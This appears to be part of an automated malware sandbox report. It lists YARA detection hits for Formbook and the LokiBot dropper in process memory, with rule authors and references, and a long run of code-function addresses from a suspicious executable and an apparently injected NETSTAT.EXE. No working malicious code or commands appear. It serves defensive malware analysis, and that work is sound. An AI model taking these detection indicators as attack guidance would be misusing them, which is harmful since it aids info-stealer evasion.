        Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.30163222370.0000000003591000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001C.00000002.30161247591.0000000002ED2000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.30170515202.0000000003F37000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.30169443980.0000000004F37000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000018.00000000.28477585132.0000000022327000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8E467026_2_1E8E4670
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97675726_2_1E976757
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8CA76026_2_1E8CA760
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C276026_2_1E8C2760
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C044526_2_1E8C0445
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E98A52626_2_1E98A526
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8CE31026_2_1E8CE310
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8B00A026_2_1E8B00A0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E96E07626_2_1E96E076
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E98010E26_2_1E98010E
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C1EB227_2_1E8C1EB2
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E979ED227_2_1E979ED2
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E963FA027_2_1E963FA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E971FC627_2_1E971FC6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E93FF4027_2_1E93FF40
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97FF6327_2_1E97FF63
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E959C9827_2_1E959C98
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DFCE027_2_1E8DFCE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E947CE827_2_1E947CE8
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C3C6027_2_1E8C3C60
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C9DD027_2_1E8C9DD0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95FDF427_2_1E95FDF4
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97FD2727_2_1E97FD27
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E973D2227_2_1E973D22
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E977D4C27_2_1E977D4C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97FA8927_2_1E97FA89
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DFAA027_2_1E8DFAA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E951B8027_2_1E951B80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8FDB1927_2_1E8FDB19
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97FB2E27_2_1E97FB2E
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9398B227_2_1E9398B2
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9718DA27_2_1E9718DA
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9778F327_2_1E9778F3
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C380027_2_1E8C3800
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E93587027_2_1E935870
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97F87227_2_1E97F872
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C987027_2_1E8C9870
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DB87027_2_1E8DB870
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9059C027_2_1E9059C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8899E827_2_1E8899E8
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97F6F627_2_1E97F6F6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9336EC27_2_1E9336EC
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96162327_2_1E961623
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95D62C27_2_1E95D62C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96D64627_2_1E96D646
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95549027_2_1E955490
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E92D48027_2_1E92D480
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9775C627_2_1E9775C6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97F5C927_2_1E97F5C9
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8AD2EC27_2_1E8AD2EC
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97124C27_2_1E97124C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8B138027_2_1E8B1380
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97F33027_2_1E97F330
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8F508C27_2_1E8F508C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CB0D027_2_1E8CB0D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E9770F127_2_1E9770F1
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C51C027_2_1E8C51C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DB1E027_2_1E8DB1E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8AF11327_2_1E8AF113
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95D13027_2_1E95D130
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E90717A27_2_1E90717A
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E970EAD27_2_1E970EAD
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8B2EE827_2_1E8B2EE8
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E902E4827_2_1E902E48
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8E0E5027_2_1E8E0E50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E960E6D27_2_1E960E6D
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97EFBF27_2_1E97EFBF
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C6FE027_2_1E8C6FE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CCF0027_2_1E8CCF00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8D8CDF27_2_1E8D8CDF
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E98ACEB27_2_1E98ACEB
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8B0C1227_2_1E8B0C12
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CAC2027_2_1E8CAC20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E93EC2027_2_1E93EC20
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96EC4C27_2_1E96EC4C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97EC6027_2_1E97EC60
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E976C6927_2_1E976C69
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8D2DB027_2_1E8D2DB0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8BAD0027_2_1E8BAD00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C0D6927_2_1E8C0D69
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E962AC027_2_1E962AC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97CA1327_2_1E97CA13
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97EA5B27_2_1E97EA5B
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E934BC027_2_1E934BC0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C0B1027_2_1E8C0B10
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E95C89F27_2_1E95C89F
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8D688227_2_1E8D6882
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C28C027_2_1E8C28C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8EE81027_2_1E8EE810
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96083527_2_1E960835
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8A686827_2_1E8A6868
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8BE9A027_2_1E8BE9A0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97E9A627_2_1E97E9A6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C068027_2_1E8C0680
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97A6C027_2_1E97A6C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8BC6E027_2_1E8BC6E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8DC60027_2_1E8DC600
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8E467027_2_1E8E4670
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E97675727_2_1E976757
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CA76027_2_1E8CA760
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C276027_2_1E8C2760
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8C044527_2_1E8C0445
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E98A52627_2_1E98A526
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E88224527_2_1E882245
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8CE31027_2_1E8CE310
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E8B00A027_2_1E8B00A0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E96E07627_2_1E96E076
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 27_2_1E98010E27_2_1E98010E
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336E31028_2_0336E310
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0332224528_2_03322245
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0342010E28_2_0342010E
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340E07628_2_0340E076
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033500A028_2_033500A0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341675728_2_03416757
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336276028_2_03362760
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336A76028_2_0336A760
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337C60028_2_0337C600
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0338467028_2_03384670
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341A6C028_2_0341A6C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336068028_2_03360680
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0335C6E028_2_0335C6E0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0342A52628_2_0342A526
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336044528_2_03360445
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03360B1028_2_03360B10
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033D4BC028_2_033D4BC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341EA5B28_2_0341EA5B
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341CA1328_2_0341CA13
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03402AC028_2_03402AC0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0335E9A028_2_0335E9A0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341E9A628_2_0341E9A6
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0338E81028_2_0338E810
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0334686828_2_03346868
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340083528_2_03400835
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033FC89F28_2_033FC89F
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337688228_2_03376882
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033628C028_2_033628C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336CF0028_2_0336CF00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03366FE028_2_03366FE0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341EFBF28_2_0341EFBF
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03400E6D28_2_03400E6D
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03380E5028_2_03380E50
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033A2E4828_2_033A2E48
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03352EE828_2_03352EE8
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03410EAD28_2_03410EAD
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0335AD0028_2_0335AD00
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03360D6928_2_03360D69
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03372DB028_2_03372DB0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340EC4C28_2_0340EC4C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336AC2028_2_0336AC20
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033DEC2028_2_033DEC20
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341EC6028_2_0341EC60
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03350C1228_2_03350C12
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03416C6928_2_03416C69
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0342ACEB28_2_0342ACEB
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_03378CDF28_2_03378CDF
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341F33028_2_0341F330
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0335138028_2_03351380
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0341124C28_2_0341124C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0334D2EC28_2_0334D2EC
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033FD13028_2_033FD130
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0334F11328_2_0334F113
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033A717A28_2_033A717A
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0337B1E028_2_0337B1E0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_033651C028_2_033651C0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_034170F128_2_034170F1
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0339508C28_2_0339508C
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0336B0D028_2_0336B0D0
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0332170728_2_03321707
        Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 28_2_0340D64628_2_0340D646
